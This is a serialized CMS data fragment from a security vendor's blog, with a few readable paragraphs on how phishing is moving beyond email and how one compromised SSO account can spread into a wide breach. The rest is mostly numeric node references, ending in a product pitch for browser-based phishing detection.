",{"data":63216,"content":63217,"nodeType":178},{},[63218],{"data":63219,"marks":63220,"value":63221,"nodeType":173},{},[],"It’s important to think about the bigger picture when it comes to a modern phishing compromise. ",{"data":63223,"content":63224,"nodeType":178},{},[63225],{"data":63226,"marks":63227,"value":63228,"nodeType":173},{},[],"Most phishing attacks focus on core enterprise cloud platforms such as Microsoft and Google, or specialist Identity Providers like Okta. Taking over one of these accounts doesn’t just give access to the core apps and data within the respective app, but also enables the attacker to leverage SSO to sign into any connected app that the employee logs into with their account. ",{"data":63230,"content":63231,"nodeType":178},{},[63232,63236,63244,63248,63257],{"data":63233,"marks":63234,"value":63235,"nodeType":173},{},[],"This gives an attacker access to just about every core business function and dataset in your organization. And from this point, it’s much easier to target other users of these internal apps — using internal messenger apps like ",{"data":63237,"content":63238,"nodeType":186},{"uri":730},[63239],{"data":63240,"marks":63241,"value":63243,"nodeType":173},{},[63242],{"type":194},"Slack or Teams",{"data":63245,"marks":63246,"value":63247,"nodeType":173},{},[],", or techniques like ",{"data":63249,"content":63251,"nodeType":186},{"uri":63250},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/samljacking/description.md",[63252],{"data":63253,"marks":63254,"value":63256,"nodeType":173},{},[63255],{"type":194},"SAMLjacking",{"data":63258,"marks":63259,"value":63260,"nodeType":173},{},[]," to turn an app into a watering hole for other users trying to log in. ",{"data":63262,"content":63263,"nodeType":178},{},[63264],{"data":63265,"marks":63266,"value":63267,"nodeType":173},{},[],"A single account compromise can quickly snowball into a multi-million dollar, business-wide breach.",{"data":63269,"content":63270,"nodeType":231},{},[],{"data":63272,"content":63273,"nodeType":169},{},[63274],{"data":63275,"marks":63276,"value":63278,"nodeType":173},{},[63277],{"type":370},"What can organizations do about non-email phishing? ",{"data":63280,"content":63281,"nodeType":178},{},[63282],{"data":63283,"marks":63284,"value":63285,"nodeType":173},{},[],"It’s clear that the traditional anti-phishing toolset hasn’t kept up with phishing innovation. ",{"data":63287,"content":63288,"nodeType":178},{},[63289],{"data":63290,"marks":63291,"value":63292,"nodeType":173},{},[],"To tackle modern phishing attacks, organizations need a solution that detects and blocks phishing across all apps and delivery vectors. ",{"data":63294,"content":63295,"nodeType":178},{},[63296],{"data":63297,"marks":63298,"value":63299,"nodeType":173},{},[],"Push Security doesn’t detect the redirect tricks, or rely on outdated domain TI feeds. It doesn’t matter what delivery channel or camouflage methods are used, Push detects and blocks attacks by identifying the attack in real time, as the user loads and interacts with the page in their web browser.",{"data":63301,"content":63302,"nodeType":178},{},[63303],{"data":63304,"marks":63305,"value":63306,"nodeType":173},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. ",{"data":63308,"content":63309,"nodeType":178},{},[63310,63313,63320,63323,63330],{"data":63311,"marks":63312,"value":1451,"nodeType":173},{},[],{"data":63314,"content":63315,"nodeType":186},{"uri":1456},[63316],{"data":63317,"marks":63318,"value":1459,"nodeType":173},{},[63319],{"type":194},{"data":63321,"marks":63322,"value":1464,"nodeType":173},{},[],{"data":63324,"content":63325,"nodeType":186},{"uri":1469},[63326],{"data":63327,"marks":63328,"value":1472,"nodeType":173},{},[63329],{"type":194},{"data":63331,"marks":63332,"value":1477,"nodeType":173},{},[],"Why attackers are moving beyond email-based phishing","Why phishing attacks are moving away from exclusively email-based delivery, and what this means for security teams. \n","2025-09-18T00:00:00.000Z","why-attackers-are-moving-beyond-email-based-phishing",{"items":63338},[63339,63341],{"sys":63340,"name":505},{"id":504},{"sys":63342,"name":509},{"id":508},{"items":63344},[63345],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":63346},{"url":1496},{"__typename":1528,"sys":63348,"content":63349,"title":19633,"synopsis":21724,"hashTags":118,"publishedDate":21725,"slug":19634,"tagsCollection":63884,"authorsCollection":63890},{"id":18678},{"json":63350},{"nodeType":165,"data":63351,"content":63352},{},[63353,63389,63435,63448,63453,63459,63462,63469,63475,63481,63487,63503,63509,63514,63529,63534,63537,63544,63550,63557,63573,63579,63585,63591,63598,63604,63610,63615,63621,63651,63656,63663,63679,63685,63706,63712,63718,63723,63729,63732,63739,63752,63768,63774,63780,63786,63791,63798,63813,63816,63823,63829,63835,63841,63847,63873,63878],{"nodeType":178,"data":63354,"content":63355},{},[63356,63359,63366,63369,63376,63379,63386],{"nodeType":173,"value":21114,"marks":63357,"data":63358},[],{},{"nodeType":186,"data":63360,"content":63361},{"uri":21119},[63362],{"nodeType":173,"value":1845,"marks":63363,"data":63365},[63364],{"type":194},{},{"nodeType":173,"value":21126,"marks":63367,"data":63368},[],{},{"nodeType":186,"data":63370,"content":63371},{"uri":21131},[63372],{"nodeType":173,"value":21134,"marks":63373,"data":63375},[63374],{"type":194},{},{"nodeType":173,"value":21139,"marks":63377,"data":63378},[],{},{"nodeType":186,"data":63380,"content":63381},{"uri":21144},[63382],{"nodeType":173,"value":21147,"marks":63383,"data":63385},[63384],{"type":194},{},{"nodeType":173,"value":21152,"marks":63387,"data":63388},[],{},{"nodeType":178,"data":63390,"content":63391},{},[63392,63395,63402,63405,63412,63415,63422,63425,63432],{"nodeType":173,"value":21159,"marks":63393,"data":63394},[],{},{"nodeType":186,"data":63396,"content":63397},{"uri":21164},[63398],{"nodeType":173,"value":21167,"marks":63399,"data":63401},[63400],{"type":194},{},{"nodeType":173,"value":2936,"marks":63403,"data":63404},[],{},{"nodeType":186,"data":63406,"content":63407},{"uri":21176},[63408],{"nodeType":173,"value":21179,"marks":63409,"data":63411},[63410],{"type":194},{},{"nodeType":173,"value":2936,"marks":63413,"data":63414},[],{},{"nodeType":186,"data":63416,"content":63417},{"uri":21188},[63418],{"nodeType":173,"value":21191,"marks":63419,"data":63421},[63420],{"type":194},{},{"nodeType":173,"value":21196,"marks":63423,"data":63424},[],{},{"nodeType":186,"data":63426,"content":63427},{"uri":21201},[63428],{"nodeType":173,"value":21204,"marks":63429,"data":63431},[63430],{"type":194},{},{"nodeType":173,"value":21209,"marks":63433,"data":63434},[],{},{"nodeType":178,"data":63436,"content":63437},{},[63438,63441,63445],{"nodeType":173,"value":21216,"marks":63439,"data":63440},[],{},{"nodeType":173,"value":20995,"marks":63442,"data":63444},[63443],{"type":370},{},{"nodeType":173,"value":21224,"marks":63446,"data":63447},[],{},{"nodeType":312,"data":63449,"content":63452},{"target":63450},{"sys":63451},{"id":21021,"type":317,"linkType":318},[],{"nodeType":178,"data":63454,"content":63455},{},[63456],{"nodeType":173,"value":21236,"marks":63457,"data":63458},[],{},{"nodeType":231,"data":63460,"content":63461},{},[],{"nodeType":169,"data":63463,"content":63464},{},[63465],{"nodeType":173,"value":21246,"marks":63466,"data":63468},[63467],{"type":370},{},{"nodeType":178,"data":63470,"content":63471},{},[63472],{"nodeType":173,"value":21254,"marks":63473,"data":63474},[],{},{"nodeType":178,"data":63476,"content":63477},{},[63478],{"nodeType":173,"value":21261,"marks":63479,"data":63480},[],{},{"nodeType":178,"data":63482,"content":63483},{},[63484],{"nodeType":173,"value":21268,"marks":63485,"data":63486},[],{},{"nodeType":178,"data":63488,"content":63489},{},[63490,63493,63500],{"nodeType":173,"value":21275,"marks":63491,"data":63492},[],{},{"nodeType":186,"data":63494,"content":63495},{"uri":21280},[63496],{"nodeType":173,"value":21283,"marks":63497,"data":63499},[63498],{"type":194},{},{"nodeType":173,"value":21288,"marks":63501,"data":63502},[],{},{"nodeType":178,"data":63504,"content":63505},{},[63506],{"nodeType":173,"value":21295,"marks":63507,"data":63508},[],{},{"nodeType":312,"data":63510,"content":63513},{"target":63511},{"sys":63512},{"id":21302,"type":317,"linkType":318},[],{"nodeType":178,"data":63515,"content":63516},{},[63517,63520,63526],{"nodeType":173,"value":21308,"marks":63518,"data":63519},[],{},{"nodeType":186,"data":63521,"content":63522},{"uri":20775},[63523],{"nodeType":173,"value":21315,"marks":63524,"data":63525},[],{},{"nodeType":173,"value":21319,"marks":63527,"data":63528},[],{},{"nodeType":312,"data":63530,"content":63533},{"target":63531},{"sys":63532},{"id":21326,"type":317,"linkType":318},[],{"nodeType":231,"data":63535,"content":63536},{},[],{"nodeType":169,"data":63538,"content":63539},{},[63540],{"nodeType":173,"value":21335,"marks":63541,"data":63543},[63542],{"type":370},{},{"nodeType":178,"data":63545,"content":63546},{},[63547],{"nodeType":173,"value":21343,"marks":63548,"data":63549},[],{},{"nodeType":235,"data":63551,"content":63552},{},[63553],{"nodeType":173,"value":21350,"marks":63554,"data":63556},[63555],{"type":370},{},{"nodeType":178,"data":63558,"content":63559},{},[63560,63563,63570],{"nodeType":173,"value":21358,"marks":63561,"data":63562},[],{},{"nodeType":186,"data":63564,"content":63565},{"uri":8987},[63566],{"nodeType":173,"value":21365,"marks":63567,"data":63569},[63568],{"type":194},{},{"nodeType":173,"value":21370,"marks":63571,"data":63572},[],{},{"nodeType":178,"data":63574,"content":63575},{},[63576],{"nodeType":173,"value":21377,"marks":63577,"data":63578},[],{},{"nodeType":178,"data":63580,"content":63581},{},[63582],{"nodeType":173,"value":21384,"marks":63583,"data":63584},[],{},{"nodeType":178,"data":63586,"content":63587},{},[63588],{"nodeType":173,"value":21391,"marks":63589,"data":63590},[],{},{"nodeType":235,"data":63592,"content":63593},{},[63594],{"nodeType":173,"value":21398,"marks":63595,"data":63597},[63596],{"type":370},{},{"nodeType":178,"data":63599,"content":63600},{},[63601],{"nodeType":173,"value":21406,"marks":63602,"data":63603},[],{},{"nodeType":178,"data":63605,"content":63606},{},[63607],{"nodeType":173,"value":21413,"marks":63608,"data":63609},[],{},{"nodeType":312,"data":63611,"content":63614},{"target":63612},{"sys":63613},{"id":21420,"type":317,"linkType":318},[],{"nodeType":178,"data":63616,"content":63617},{},[63618],{"nodeType":173,"value":21426,"marks":63619,"data":63620},[],{},{"nodeType":250,"data":63622,"content":63623},{},[63624,63633,63642],{"nodeType":254,"data":63625,"content":63626},{},[63627],{"nodeType":178,"data":63628,"content":63629},{},[63630],{"nodeType":173,"value":21439,"marks":63631,"data":63632},[],{},{"nodeType":254,"data":63634,"content":63635},{},[63636],{"nodeType":178,"data":63637,"content":63638},{},[63639],{"nodeType":173,"value":21449,"marks":63640,"data":63641},[],{},{"nodeType":254,"data":63643,"content":63644},{},[63645],{"nodeType":178,"data":63646,"content":63647},{},[63648],{"nodeType":173,"value":21459,"marks":63649,"data":63650},[],{},{"nodeType":312,"data":63652,"content":63655},{"target":63653},{"sys":63654},{"id":21466,"type":317,"linkType":318},[],{"nodeType":235,"data":63657,"content":63658},{},[63659],{"nodeType":173,"value":21472,"marks":63660,"data":63662},[63661],{"type":370},{},{"nodeType":178,"data":63664,"content":63665},{},[63666,63669,63676],{"nodeType":173,"value":21480,"marks":63667,"data":63668},[],{},{"nodeType":186,"data":63670,"content":63671},{"uri":21119},[63672],{"nodeType":173,"value":21487,"marks":63673,"data":63675},[63674],{"type":194},{},{"nodeType":173,"value":21492,"marks":63677,"data":63678},[],{},{"nodeType":178,"data":63680,"content":63681},{},[63682],{"nodeType":173,"value":21499,"marks":63683,"data":63684},[],{},{"nodeType":250,"data":63686,"content":63687},{},[63688,63697],{"nodeType":254,"data":63689,"content":63690},{},[63691],{"nodeType":178,"data":63692,"content":63693},{},[63694],{"nodeType":173,"value":21512,"marks":63695,"data":63696},[],{},{"nodeType":254,"data":63698,"content":63699},{},[63700],{"nodeType":178,"data":63701,"content":63702},{},[63703],{"nodeType":173,"value":21522,"marks":63704,"data":63705},[],{},{"nodeType":178,"data":63707,"content":63708},{},[63709],{"nodeType":173,"value":21529,"marks":63710,"data":63711},[],{},{"nodeType":178,"data":63713,"content":63714},{},[63715],{"nodeType":173,"value":21536,"marks":63716,"data":63717},[],{},{"nodeType":312,"data":63719,"content":63722},{"target":63720},{"sys":63721},{"id":21543,"type":317,"linkType":318},[],{"nodeType":178,"data":63724,"content":63725},{},[63726],{"nodeType":173,"value":21549,"marks":63727,"data":63728},[],{},{"nodeType":231,"data":63730,"content":63731},{},[],{"nodeType":169,"data":63733,"content":63734},{},[63735],{"nodeType":173,"value":21559,"marks":63736,"data":63738},[63737],{"type":370},{},{"nodeType":178,"data":63740,"content":63741},{},[63742,63745,63749],{"nodeType":173,"value":21216,"marks":63743,"data":63744},[],{},{"nodeType":173,"value":20995,"marks":63746,"data":63748},[63747],{"type":370},{},{"nodeType":173,"value":21574,"marks":63750,"data":63751},[],{},{"nodeType":178,"data":63753,"content":63754},{},[63755,63758,63765],{"nodeType":173,"value":21581,"marks":63756,"data":63757},[],{},{"nodeType":186,"data":63759,"content":63760},{"uri":9099},[63761],{"nodeType":173,"value":21588,"marks":63762,"data":63764},[63763],{"type":194},{},{"nodeType":173,"value":21593,"marks":63766,"data":63767},[],{},{"nodeType":178,"data":63769,"content":63770},{},[63771],{"nodeType":173,"value":21600,"marks":63772,"data":63773},[],{},{"nodeType":178,"data":63775,"content":63776},{},[63777],{"nodeType":173,"value":21607,"marks":63778,"data":63779},[],{},{"nodeType":178,"data":63781,"content":63782},{},[63783],{"nodeType":173,"value":21614,"marks":63784,"data":63785},[],{},{"nodeType":312,"data":63787,"content":63790},{"target":63788},{"sys":63789},{"id":21021,"type":317,"linkType":318},[],{"nodeType":235,"data":63792,"content":63793},{},[63794],{"nodeType":173,"value":21626,"marks":63795,"data":63797},[63796],{"type":370},{},{"nodeType":178,"data":63799,"content":63800},{},[63801,63804,63810],{"nodeType":173,"value":21634,"marks":63802,"data":63803},[],{},{"nodeType":186,"data":63805,"content":63806},{"uri":21639},[63807],{"nodeType":173,"value":21642,"marks":63808,"data":63809},[],{},{"nodeType":173,"value":21646,"marks":63811,"data":63812},[],{},{"nodeType":231,"data":63814,"content":63815},{},[],{"nodeType":169,"data":63817,"content":63818},{},[63819],{"nodeType":173,"value":2824,"marks":63820,"data":63822},[63821],{"type":370},{},{"nodeType":178,"data":63824,"content":63825},{},[63826],{"nodeType":173,"value":21663,"marks":63827,"data":63828},[],{},{"nodeType":178,"data":63830,"content":63831},{},[63832],{"nodeType":173,"value":21670,"marks":63833,"data":63834},[],{},{"nodeType":178,"data":63836,"content":63837},{},[63838],{"nodeType":173,"value":21677,"marks":63839,"data":63840},[],{},{"nodeType":178,"data":63842,"content":63843},{},[63844],{"nodeType":173,"value":21684,"marks":63845,"data":63846},[],{},{"nodeType":178,"data":63848,"content":63849},{},[63850,63853,63860,63863,63870],{"nodeType":173,"value":1451,"marks":63851,"data":63852},[],{},{"nodeType":186,"data":63854,"content":63855},{"uri":1456},[63856],{"nodeType":173,"value":1459,"marks":63857,"data":63859},[63858],{"type":194},{},{"nodeType":173,"value":1464,"marks":63861,"data":63862},[],{},{"nodeType":186,"data":63864,"content":63865},{"uri":1469},[63866],{"nodeType":173,"value":1472,"marks":63867,"data":63869},[63868],{"type":194},{},{"nodeType":173,"value":1477,"marks":63871,"data":63872},[],{},{"nodeType":312,"data":63874,"content":63877},{"target":63875},{"sys":63876},{"id":21466,"type":317,"linkType":318},[],{"nodeType":178,"data":63879,"content":63880},{},[63881],{"nodeType":173,"value":37,"marks":63882,"data":63883},[],{},{"items":63885},[63886,63888],{"sys":63887,"name":509},{"id":508},{"sys":63889,"name":505},{"id":504},{"items":63891},[63892],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":63893},{"url":1496},{"__typename":1528,"sys":63895,"content":63896,"title":60690,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"tagsCollection":64449,"authorsCollection":64455},{"id":60053},{"json":63897},{"data":63898,"content":63899,"nodeType":165},{},[63900,63913,63919,63922,63929,63935,63941,63957,63962,63968,63974,63980,63986,63989,63996,64002,64007,64013,64020,64026,64032,64037,64053,64058,64064,64070,64076,64081,64084,64091,64107,64113,64139,64145,64151,64156,64162,64168,64174,64177,64184,64199,64204,64210,64216,64221,64227,64233,64236,64243,64249,64265,64301,64307,64313,64319,64322,64329,64335,64341,64347,64350,64357,64363,64389,64405,64411,64414,64421,64427,64433],{"data":63901,"content":63902,"nodeType":178},{},[63903,63906,63910],{"data":63904,"marks":63905,"value":60064,"nodeType":173},{},[],{"data":63907,"marks":63908,"value":60069,"nodeType":173},{},[63909],{"type":1646},{"data":63911,"marks":63912,"value":60073,"nodeType":173},{},[],{"data":63914,"content":63915,"nodeType":178},{},[63916],{"data":63917,"marks":63918,"value":60080,"nodeType":173},{},[],{"data":63920,"content":63921,"nodeType":231},{},[],{"data":63923,"content":63924,"nodeType":169},{},[63925],{"data":63926,"marks":63927,"value":60091,"nodeType":173},{},[63928],{"type":370},{"data":63930,"content":63931,"nodeType":178},{},[63932],{"data":63933,"marks":63934,"value":60098,"nodeType":173},{},[],{"data":63936,"content":63937,"nodeType":178},{},[63938],{"data":63939,"marks":63940,"value":60105,"nodeType":173},{},[],{"data":63942,"content":63943,"nodeType":178},{},[63944,63947,63954],{"data":63945,"marks":63946,"value":60112,"nodeType":173},{},[],{"data":63948,"content":63949,"nodeType":186},{"uri":60115},[63950],{"data":63951,"marks":63952,"value":27706,"nodeType":173},{},[63953],{"type":194},{"data":63955,"marks":63956,"value":60124,"nodeType":173},{},[],{"data":63958,"content":63961,"nodeType":312},{"target":63959},{"sys":63960},{"id":60129,"type":317,"linkType":318},[],{"data":63963,"content":63964,"nodeType":178},{},[63965],{"data":63966,"marks":63967,"value":60137,"nodeType":173},{},[],{"data":63969,"content":63970,"nodeType":178},{},[63971],{"data":63972,"marks":63973,"value":60144,"nodeType":173},{},[],{"data":63975,"content":63976,"nodeType":178},{},[63977],{"data":63978,"marks":63979,"value":60151,"nodeType":173},{},[],{"data":63981,"content":63982,"nodeType":178},{},[63983],{"data":63984,"marks":63985,"value":60158,"nodeType":173},{},[],{"data":63987,"content":63988,"nodeType":231},{},[],{"data":63990,"content":63991,"nodeType":169},{},[63992],{"data":63993,"marks":63994,"value":60169,"nodeType":173},{},[63995],{"type":370},{"data":63997,"content":63998,"nodeType":178},{},[63999],{"data":64000,"marks":64001,"value":60176,"nodeType":173},{},[],{"data":64003,"content":64006,"nodeType":312},{"target":64004},{"sys":64005},{"id":27196,"type":317,"linkType":318},[],{"data":64008,"content":64009,"nodeType":178},{},[64010],{"data":64011,"marks":64012,"value":60188,"nodeType":173},{},[],{"data":64014,"content":64015,"nodeType":235},{},[64016],{"data":64017,"marks":64018,"value":60196,"nodeType":173},{},[64019],{"type":370},{"data":64021,"content":64022,"nodeType":178},{},[64023],{"data":64024,"marks":64025,"value":60203,"nodeType":173},{},[],{"data":64027,"content":64028,"nodeType":178},{},[64029],{"data":64030,"marks":64031,"value":60210,"nodeType":173},{},[],{"data":64033,"content":64036,"nodeType":312},{"target":64034},{"sys":64035},{"id":60215,"type":317,"linkType":318},[],{"data":64038,"content":64039,"nodeType":178},{},[64040,64043,64050],{"data":64041,"marks":64042,"value":60223,"nodeType":173},{},[],{"data":64044,"content":64045,"nodeType":186},{"uri":60226},[64046],{"data":64047,"marks":64048,"value":39789,"nodeType":173},{},[64049],{"type":194},{"data":64051,"marks":64052,"value":60235,"nodeType":173},{},[],{"data":64054,"content":64057,"nodeType":312},{"target":64055},{"sys":64056},{"id":60240,"type":317,"linkType":318},[],{"data":64059,"content":64060,"nodeType":178},{},[64061],{"data":64062,"marks":64063,"value":60248,"nodeType":173},{},[],{"data":64065,"content":64066,"nodeType":178},{},[64067],{"data":64068,"marks":64069,"value":21384,"nodeType":173},{},[],{"data":64071,"content":64072,"nodeType":178},{},[64073],{"data":64074,"marks":64075,"value":60261,"nodeType":173},{},[],{"data":64077,"content":64080,"nodeType":312},{"target":64078},{"sys":64079},{"id":60266,"type":317,"linkType":318},[],{"data":64082,"content":64083,"nodeType":231},{},[],{"data":64085,"content":64086,"nodeType":235},{},[64087],{"data":64088,"marks":64089,"value":60278,"nodeType":173},{},[64090],{"type":370},{"data":64092,"content":64093,"nodeType":178},{},[64094,64097,64104],{"data":64095,"marks":64096,"value":21114,"nodeType":173},{},[],{"data":64098,"content":64099,"nodeType":186},{"uri":21119},[64100],{"data":64101,"marks":64102,"value":1845,"nodeType":173},{},[64103],{"type":194},{"data":64105,"marks":64106,"value":197,"nodeType":173},{},[],{"data":64108,"content":64109,"nodeType":178},{},[64110],{"data":64111,"marks":64112,"value":60301,"nodeType":173},{},[],{"data":64114,"content":64115,"nodeType":178},{},[64116,64119,64126,64129,64136],{"data":64117,"marks":64118,"value":60308,"nodeType":173},{},[],{"data":64120,"content":64121,"nodeType":186},{"uri":21280},[64122],{"data":64123,"marks":64124,"value":21283,"nodeType":173},{},[64125],{"type":194},{"data":64127,"marks":64128,"value":60319,"nodeType":173},{},[],{"data":64130,"content":64131,"nodeType":186},{"uri":60322},[64132],{"data":64133,"marks":64134,"value":60328,"nodeType":173},{},[64135],{"type":194},{"data":64137,"marks":64138,"value":1477,"nodeType":173},{},[],{"data":64140,"content":64141,"nodeType":178},{},[64142],{"data":64143,"marks":64144,"value":60338,"nodeType":173},{},[],{"data":64146,"content":64147,"nodeType":178},{},[64148],{"data":64149,"marks":64150,"value":60345,"nodeType":173},{},[],{"data":64152,"content":64155,"nodeType":312},{"target":64153},{"sys":64154},{"id":60350,"type":317,"linkType":318},[],{"data":64157,"content":64158,"nodeType":178},{},[64159],{"data":64160,"marks":64161,"value":60358,"nodeType":173},{},[],{"data":64163,"content":64164,"nodeType":178},{},[64165],{"data":64166,"marks":64167,"value":60365,"nodeType":173},{},[],{"data":64169,"content":64170,"nodeType":178},{},[64171],{"data":64172,"marks":64173,"value":60372,"nodeType":173},{},[],{"data":64175,"content":64176,"nodeType":231},{},[],{"data":64178,"content":64179,"nodeType":235},{},[64180],{"data":64181,"marks":64182,"value":60383,"nodeType":173},{},[64183],{"type":370},{"data":64185,"content":64186,"nodeType":178},{},[64187,64190,64196],{"data":64188,"marks":64189,"value":60390,"nodeType":173},{},[],{"data":64191,"content":64192,"nodeType":186},{"uri":19838},[64193],{"data":64194,"marks":64195,"value":8091,"nodeType":173},{},[],{"data":64197,"marks":64198,"value":2340,"nodeType":173},{},[],{"data":64200,"content":64203,"nodeType":312},{"target":64201},{"sys":64202},{"id":60404,"type":317,"linkType":318},[],{"data":64205,"content":64206,"nodeType":178},{},[64207],{"data":64208,"marks":64209,"value":60412,"nodeType":173},{},[],{"data":64211,"content":64212,"nodeType":178},{},[64213],{"data":64214,"marks":64215,"value":60419,"nodeType":173},{},[],{"data":64217,"content":64220,"nodeType":312},{"target":64218},{"sys":64219},{"id":60424,"type":317,"linkType":318},[],{"data":64222,"content":64223,"nodeType":178},{},[64224],{"data":64225,"marks":64226,"value":60432,"nodeType":173},{},[],{"data":64228,"content":64229,"nodeType":178},{},[64230],{"data":64231,"marks":64232,"value":60439,"nodeType":173},{},[],{"data":64234,"content":64235,"nodeType":231},{},[],{"data":64237,"content":64238,"nodeType":235},{},[64239],{"data":64240,"marks":64241,"value":60450,"nodeType":173},{},[64242],{"type":370},{"data":64244,"content":64245,"nodeType":178},{},[64246],{"data":64247,"marks":64248,"value":60457,"nodeType":173},{},[],{"data":64250,"content":64251,"nodeType":178},{},[64252,64255,64262],{"data":64253,"marks":64254,"value":60464,"nodeType":173},{},[],{"data":64256,"content":64257,"nodeType":186},{"uri":60467},[64258],{"data":64259,"marks":64260,"value":60473,"nodeType":173},{},[64261],{"type":194},{"data":64263,"marks":64264,"value":60477,"nodeType":173},{},[],{"data":64266,"content":64267,"nodeType":178},{},[64268,64271,64278,64281,64288,64291,64298],{"data":64269,"marks":64270,"value":60484,"nodeType":173},{},[],{"data":64272,"content":64273,"nodeType":186},{"uri":60487},[64274],{"data":64275,"marks":64276,"value":60493,"nodeType":173},{},[64277],{"type":194},{"data":64279,"marks":64280,"value":60497,"nodeType":173},{},[],{"data":64282,"content":64283,"nodeType":186},{"uri":60500},[64284],{"data":64285,"marks":64286,"value":60506,"nodeType":173},{},[64287],{"type":194},{"data":64289,"marks":64290,"value":9534,"nodeType":173},{},[],{"data":64292,"content":64293,"nodeType":186},{"uri":60512},[64294],{"data":64295,"marks":64296,"value":60518,"nodeType":173},{},[64297],{"type":194},{"data":64299,"marks":64300,"value":1477,"nodeType":173},{},[],{"data":64302,"content":64303,"nodeType":178},{},[64304],{"data":64305,"marks":64306,"value":60528,"nodeType":173},{},[],{"data":64308,"content":64309,"nodeType":178},{},[64310],{"data":64311,"marks":64312,"value":60535,"nodeType":173},{},[],{"data":64314,"content":64315,"nodeType":178},{},[64316],{"data":64317,"marks":64318,"value":60542,"nodeType":173},{},[],{"data":64320,"content":64321,"nodeType":231},{},[],{"data":64323,"content":64324,"nodeType":235},{},[64325],{"data":64326,"marks":64327,"value":60553,"nodeType":173},{},[64328],{"type":370},{"data":64330,"content":64331,"nodeType":178},{},[64332],{"data":64333,"marks":64334,"value":60560,"nodeType":173},{},[],{"data":64336,"content":64337,"nodeType":178},{},[64338],{"data":64339,"marks":64340,"value":60567,"nodeType":173},{},[],{"data":64342,"content":64343,"nodeType":178},{},[64344],{"data":64345,"marks":64346,"value":60574,"nodeType":173},{},[],{"data":64348,"content":64349,"nodeType":231},{},[],{"data":64351,"content":64352,"nodeType":235},{},[64353],{"data":64354,"marks":64355,"value":60585,"nodeType":173},{},[64356],{"type":370},{"data":64358,"content":64359,"nodeType":178},{},[64360],{"data":64361,"marks":64362,"value":60592,"nodeType":173},{},[],{"data":64364,"content":64365,"nodeType":178},{},[64366,64369,64376,64379,64386],{"data":64367,"marks":64368,"value":60599,"nodeType":173},{},[],{"data":64370,"content":64371,"nodeType":186},{"uri":60115},[64372],{"data":64373,"marks":64374,"value":27706,"nodeType":173},{},[64375],{"type":194},{"data":64377,"marks":64378,"value":60610,"nodeType":173},{},[],{"data":64380,"content":64381,"nodeType":186},{"uri":60613},[64382],{"data":64383,"marks":64384,"value":27729,"nodeType":173},{},[64385],{"type":194},{"data":64387,"marks":64388,"value":60622,"nodeType":173},{},[],{"data":64390,"content":64391,"nodeType":178},{},[64392,64395,64402],{"data":64393,"marks":64394,"value":60629,"nodeType":173},{},[],{"data":64396,"content":64397,"nodeType":186},{"uri":60632},[64398],{"data":64399,"marks":64400,"value":60638,"nodeType":173},{},[64401],{"type":194},{"data":64403,"marks":64404,"value":60642,"nodeType":173},{},[],{"data":64406,"content":64407,"nodeType":178},{},[64408],{"data":64409,"marks":64410,"value":60649,"nodeType":173},{},[],{"data":64412,"content":64413,"nodeType":231},{},[],{"data":64415,"content":64416,"nodeType":169},{},[64417],{"data":64418,"marks":64419,"value":40632,"nodeType":173},{},[64420],{"type":370},{"data":64422,"content":64423,"nodeType":178},{},[64424],{"data":64425,"marks":64426,"value":60666,"nodeType":173},{},[],{"data":64428,"content":64429,"nodeType":178},{},[64430],{"data":64431,"marks":64432,"value":27202,"nodeType":173},{},[],{"data":64434,"content":64435,"nodeType":178},{},[64436,64439,64446],{"data":64437,"marks":64438,"value":59468,"nodeType":173},{},[],{"data":64440,"content":64441,"nodeType":186},{"uri":60681},[64442],{"data":64443,"marks":64444,"value":1472,"nodeType":173},{},[64445],{"type":194},{"data":64447,"marks":64448,"value":1477,"nodeType":173},{},[],{"items":64450},[64451,64453],{"sys":64452,"name":505},{"id":504},{"sys":64454,"name":509},{"id":508},{"items":64456},[64457],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":64458},{"url":1496},{"items":64460},[64461],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":64462},{"url":1496},{"json":64464,"links":64960},{"nodeType":165,"data":64465,"content":64466},{},[64467,64473,64479,64489,64494,64500,64503,64510,64516,64521,64534,64540,64561,64567,64572,64575,64582,64608,64613,64629,64634,64650,64656,64661,64664,64671,64677,64693,64699,64715,64721,64726,64729,64736,64742,64772,64778,64784,64824,64839,64848,64854,64857,64864,64880,64886,64892,64897,64900,64907,64923,64949,64954],{"nodeType":178,"data":64468,"content":64469},{},[64470],{"nodeType":173,"value":20525,"marks":64471,"data":64472},[],{},{"nodeType":178,"data":64474,"content":64475},{},[64476],{"nodeType":173,"value":20532,"marks":64477,"data":64478},[],{},{"nodeType":178,"data":64480,"content":64481},{},[64482,64485],{"nodeType":173,"value":20539,"marks":64483,"data":64484},[],{},{"nodeType":173,"value":20543,"marks":64486,"data":64488},[64487],{"type":370},{},{"nodeType":312,"data":64490,"content":64493},{"target":64491},{"sys":64492},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":64495,"content":64496},{},[64497],{"nodeType":173,"value":20556,"marks":64498,"data":64499},[],{},{"nodeType":231,"data":64501,"content":64502},{},[],{"nodeType":169,"data":64504,"content":64505},{},[64506],{"nodeType":173,"value":20566,"marks":64507,"data":64509},[64508],{"type":370},{},{"nodeType":178,"data":64511,"content":64512},{},[64513],{"nodeType":173,"value":20574,"marks":64514,"data":64515},[],{},{"nodeType":312,"data":64517,"content":64520},{"target":64518},{"sys":64519},{"id":20581,"type":317,"linkType":318},[],{"nodeType":178,"data":64522,"content":64523},{},[64524,64527,64531],{"nodeType":173,"value":20587,"marks":64525,"data":64526},[],{},{"nodeType":173,"value":20591,"marks":64528,"data":64530},[64529],{"type":370},{},{"nodeType":173,"value":20596,"marks":64532,"data":64533},[],{},{"nodeType":178,"data":64535,"content":64536},{},[64537],{"nodeType":173,"value":20603,"marks":64538,"data":64539},[],{},{"nodeType":250,"data":64541,"content":64542},{},[64543,64552],{"nodeType":254,"data":64544,"content":64545},{},[64546],{"nodeType":178,"data":64547,"content":64548},{},[64549],{"nodeType":173,"value":20616,"marks":64550,"data":64551},[],{},{"nodeType":254,"data":64553,"content":64554},{},[64555],{"nodeType":178,"data":64556,"content":64557},{},[64558],{"nodeType":173,"value":20626,"marks":64559,"data":64560},[],{},{"nodeType":178,"data":64562,"content":64563},{},[64564],{"nodeType":173,